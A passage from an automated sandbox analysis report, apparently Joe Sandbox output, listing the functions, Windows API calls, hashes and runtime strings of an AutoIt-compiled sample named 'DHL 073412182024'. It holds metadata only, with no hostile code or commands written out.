                                                                                      • Opcode Fuzzy Hash: cbd5fd70dec44252c62d9f35cbca2d9e04de67547f078a375e78eec4b2a2682b
                                                                                      • Instruction Fuzzy Hash: 2A112B316C9307BAE7055B14EC82DEA679CDF15358B70512FF904F61C2D770AD815278
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$LocalTime
                                                                                      • String ID:
                                                                                      • API String ID: 952045576-0
                                                                                      • Opcode ID: 2d65f06bcd062df0d06e841249ac88c157e287011af5570a97024857bdc1fd2e
                                                                                      • Instruction ID: aae215a9d7a9ceeca8899a14fcfbe181d862a4b54522a85598fcd2a509920f8a
                                                                                      • Opcode Fuzzy Hash: 2d65f06bcd062df0d06e841249ac88c157e287011af5570a97024857bdc1fd2e
                                                                                      • Instruction Fuzzy Hash: 01418E65C1021965CB11EBF4CC8AECFB7A8EF45310F50886AE518F3261EB34E245C7B9
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DF682C,00000004,00000000,00000000), ref: 00DBF953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DF682C,00000004,00000000,00000000), ref: 00DFF3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DF682C,00000004,00000000,00000000), ref: 00DFF454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: ef82c5d72437a36f79a19ff350f07854f6425f1c030476fcdcf132b60cee615a
                                                                                      • Instruction ID: c058b4d714f19a033243a17e2d80f1d662fbbb20968227ee5cbb4f380600cbbf
                                                                                      • Opcode Fuzzy Hash: ef82c5d72437a36f79a19ff350f07854f6425f1c030476fcdcf132b60cee615a
                                                                                      • Instruction Fuzzy Hash: 4741F431608784FECF398B298C887BE7B92AF56314F19843DE58762560C672E884DF31
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00E32D1B
                                                                                      • GetDC.USER32(00000000), ref: 00E32D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E32D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E32D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E32D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E32D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00E32DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E32DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: 7310027319ed20b009089f2a57e6ffd4229bb31d1ccf621e69f7c67c70c8a7c0
                                                                                      • Instruction ID: ac7ad831d62f4dd1c8c8d3686d5d0c2d0f63d74ec2152845ab436ef373a3922f
                                                                                      • Opcode Fuzzy Hash: 7310027319ed20b009089f2a57e6ffd4229bb31d1ccf621e69f7c67c70c8a7c0
                                                                                      • Instruction Fuzzy Hash: 33319C72201214BFEB218F51CC8AFEB3FA9EF49715F144055FE48BA291C6759C41CBA1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: ae5836e34969c02f83db924d1f5c3521ff97eb9ab079dfbeff5af3ff1bd23b60
                                                                                      • Instruction ID: 4feda979d296e9feb9c2d35ed657eb41afde6cb125e77c0ee1b212e3b80f2851
                                                                                      • Opcode Fuzzy Hash: ae5836e34969c02f83db924d1f5c3521ff97eb9ab079dfbeff5af3ff1bd23b60
                                                                                      • Instruction Fuzzy Hash: 0721C867A40B1AB7D2145510AE92FFB635CEE22388F442025FD047B5C2F722ED51CDB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: 19ce7e4baf7c14081968b213c83ecdba80c42027c005f43c284e76fb40819dcb
                                                                                      • Instruction ID: 636f3c420d9395645a40bad0e6ce2e94939a0b00f9513671fb90614ca252c294
                                                                                      • Opcode Fuzzy Hash: 19ce7e4baf7c14081968b213c83ecdba80c42027c005f43c284e76fb40819dcb
                                                                                      • Instruction Fuzzy Hash: 28D1A072A0061A9FDF10CF98E984FAEB7B5BF48348F149069E915BB281D770DD45CBA0
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 00DE15CE
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DE1651
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DE16E4
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DE16FB
                                                                                        • Part of subcall function 00DD3820: RtlAllocateHeap.NTDLL(00000000,?,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6,?,00DA1129), ref: 00DD3852
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DE1777
                                                                                      • __freea.LIBCMT ref: 00DE17A2
                                                                                      • __freea.LIBCMT ref: 00DE17AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2829977744-0
                                                                                      • Opcode ID: acf247e6bc501dbd3f3d2596ce470c6c399b68365dc77487252b3117ad1472e5
                                                                                      • Instruction ID: 598b084f83059b2b8f43b6ea98720d2c72f8b463ca1f8c96fb511943299b62da
                                                                                      • Opcode Fuzzy Hash: acf247e6bc501dbd3f3d2596ce470c6c399b68365dc77487252b3117ad1472e5
                                                                                      • Instruction Fuzzy Hash: EF91B17AF002969ADB20AF66C881EEE7BB5EF49710F184659E846E7281D735CC44CB70
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 9d2da1b5523d4f92867652ab38208f7b5c811d8ec0061fbba714532f66c38c6b
                                                                                      • Instruction ID: 50c2403e4c78ace8eebe662f755d89ad1fbaefae3e8e9869629c2480c3af35c8
                                                                                      • Opcode Fuzzy Hash: 9d2da1b5523d4f92867652ab38208f7b5c811d8ec0061fbba714532f66c38c6b
                                                                                      • Instruction Fuzzy Hash: 199193B1A00229AFDF24CFA5D844FAEBBB8EF46714F10955AF515BB280D7709941CFA0
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00E1125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00E112A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E112D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E1135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E113C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E11430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: ed2e954b24a7354ee47b15cbe11f08d73fac04985fd13bb07ad14e767ef09c31
                                                                                      • Instruction ID: f1c27b9fabeb18dbed1343841873474fcc27db779dbcf8e5b70ac51da2ee4942
                                                                                      • Opcode Fuzzy Hash: ed2e954b24a7354ee47b15cbe11f08d73fac04985fd13bb07ad14e767ef09c31
                                                                                      • Instruction Fuzzy Hash: DA91EF71A00219AFDB00DFA4D884BFEB7B5FF45714F1050A9EA51FB2A1D774A981CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 749de3e54cf2f644800d5276b06c3b7c29d8d52838163cbe2fc538b36084fb8c
                                                                                      • Instruction ID: 69232fc820396bb5e217f0bffa2bb310c842f996dc9dcab33515bdec32a7a502
                                                                                      • Opcode Fuzzy Hash: 749de3e54cf2f644800d5276b06c3b7c29d8d52838163cbe2fc538b36084fb8c
                                                                                      • Instruction Fuzzy Hash: 25911571940259EFCB14CFA9CC88AEEBBB8FF49320F148055E616B7251D674AA42CB70
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00E2396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E23A7A
                                                                                      • _wcslen.LIBCMT ref: 00E23A8A
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E23C1F
                                                                                        • Part of subcall function 00E10CDF: VariantInit.OLEAUT32(00000000), ref: 00E10D1F
                                                                                        • Part of subcall function 00E10CDF: VariantCopy.OLEAUT32(?,?), ref: 00E10D28
                                                                                        • Part of subcall function 00E10CDF: VariantClear.OLEAUT32(?), ref: 00E10D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4137639002-1221869570
                                                                                      • Opcode ID: 86b8d52a45b2078566d62ee031508d94153a74e4b99667df6ef2ef3aefd4dc57
                                                                                      • Instruction ID: 7f85977e36b4f04f5f3d3d0c5ab97213835049011ed155d439ab648d6cf5e80e
                                                                                      • Opcode Fuzzy Hash: 86b8d52a45b2078566d62ee031508d94153a74e4b99667df6ef2ef3aefd4dc57
                                                                                      • Instruction Fuzzy Hash: A19133746083159FC704EF24D48196AB7E5FB89314F14882EF88AA7351DB35EE45CFA2
                                                                                      APIs
                                                                                        • Part of subcall function 00E0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?,?,00E0035E), ref: 00E0002B
                                                                                        • Part of subcall function 00E0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?), ref: 00E00046
                                                                                        • Part of subcall function 00E0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?,?), ref: 00E00054
                                                                                        • Part of subcall function 00E0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DFFF41,80070057,?), ref: 00E00064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E24C51
                                                                                      • _wcslen.LIBCMT ref: 00E24D59
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E24DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00E24DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 614568839-2785691316
                                                                                      • Opcode ID: 836d219a56f883d12b4262f3c25bd18281db1ce8d64cdaf15f26f435cbcc1e94
                                                                                      • Instruction ID: a4c71d60f98908684210f4ab28eeed26ab6b0910e35a5d11757c6451c7bebbcd
                                                                                      • Opcode Fuzzy Hash: 836d219a56f883d12b4262f3c25bd18281db1ce8d64cdaf15f26f435cbcc1e94
                                                                                      • Instruction Fuzzy Hash: DB91E5B1D002299FDB14DFA4D891AEEBBB9FB08314F108569E915BB291DB349A44CF60
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 00E32183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00E321B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E321DD
                                                                                      • _wcslen.LIBCMT ref: 00E32213
                                                                                      • GetMenuItemID.USER32(?,?), ref: 00E3224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 00E3225B
                                                                                        • Part of subcall function 00E03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03A57
                                                                                        • Part of subcall function 00E03A3D: GetCurrentThreadId.KERNEL32 ref: 00E03A5E
                                                                                        • Part of subcall function 00E03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E025B3), ref: 00E03A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E322E3
                                                                                        • Part of subcall function 00E0E97B: Sleep.KERNEL32 ref: 00E0E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4196846111-0
                                                                                      • Opcode ID: ba67d97b647d77f6a25326b09e003725cfa410703be1976043cfa298ed6f5c02
                                                                                      • Instruction ID: 4347fb6f5bf2bc984ad8bff65135d4f57d0a37dfe8bb285547a755eed7fd40d4
                                                                                      • Opcode Fuzzy Hash: ba67d97b647d77f6a25326b09e003725cfa410703be1976043cfa298ed6f5c02
                                                                                      • Instruction Fuzzy Hash: E3718D35A00205AFCB10DF64C849AAEBBF5EF89324F14945DE956BB351DB34ED41CBA0
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00E0AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 00E0AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 00E0AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E0AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E0AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E0AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E0B020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 07cafe238257e8c0aaf63d114a4f676d1351777ff2e51c36f53d1c7cd326ea27
                                                                                      • Instruction ID: e1673238bf17e43629c9845d5472e2a1b2a6f4ca056641ed887b801bf63ba494
                                                                                      • Opcode Fuzzy Hash: 07cafe238257e8c0aaf63d114a4f676d1351777ff2e51c36f53d1c7cd326ea27
                                                                                      • Instruction Fuzzy Hash: 4851B2A06047DA7DFB368334C845BBABEE96B06308F0C9599E1D9A54D2C398A8C8D751
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 00E0AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 00E0AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 00E0AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E0ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E0ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E0AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E0AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: a0ae601916703be5edef6c76788e8a02c6c7899c96f5dabc59ffdf02dfae4712
                                                                                      • Instruction ID: d063caeae5b9fcdabdceb14da3ea569708cfd3cb28aa7a43b6aa80bf6f480537
                                                                                      • Opcode Fuzzy Hash: a0ae601916703be5edef6c76788e8a02c6c7899c96f5dabc59ffdf02dfae4712
                                                                                      • Instruction Fuzzy Hash: D351E3A15047D93DFB328334CC55BBABEE86B46308F0C9499E1D5668C2D294ECC9D762
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00DE3CD6,?,?,?,?,?,?,?,?,00DD5BA3,?,?,00DE3CD6,?,?), ref: 00DD5470
                                                                                      • __fassign.LIBCMT ref: 00DD54EB
                                                                                      • __fassign.LIBCMT ref: 00DD5506
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00DE3CD6,00000005,00000000,00000000), ref: 00DD552C
                                                                                      • WriteFile.KERNEL32(?,00DE3CD6,00000000,00DD5BA3,00000000,?,?,?,?,?,?,?,?,?,00DD5BA3,?), ref: 00DD554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,00DD5BA3,00000000,?,?,?,?,?,?,?,?,?,00DD5BA3,?), ref: 00DD5584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
